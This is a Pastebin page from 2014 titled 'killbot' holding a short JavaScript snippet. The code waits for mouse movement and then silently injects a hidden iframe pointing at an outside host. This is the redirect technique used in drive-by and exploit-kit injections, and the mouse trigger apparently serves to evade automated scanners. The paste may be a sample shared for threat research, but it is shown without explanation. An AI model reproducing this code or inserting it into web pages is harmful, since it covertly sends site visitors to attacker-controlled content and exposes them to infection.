Advertisement
Kafeine

killbot

Jun 24th, 2014
901
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function _killbot() {
  2.     if (!document.getElementById('1q4r3e12w')) {
  3.         var coun = document.createElement('iframe');
  4.         coun.src = 'http://8b9f5f50xpshjr.mtacte.uni.me';
  5.         coun.width = '300';
  6.         coun.id = '1q4r3e12w';
  7.         coun.height = '100%';
  8.         coun.scrolling = 'no';
  9.         coun.style.border = 'none';
  10.         coun.style.visibility = 'hidden';
  11.         coun.style.filter = 'none';
  12.         document.body.appendChild(coun);
  13.     }
  14. }
  15. document.onmousemove = function() {
  16.     return _killbot()
  17. };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement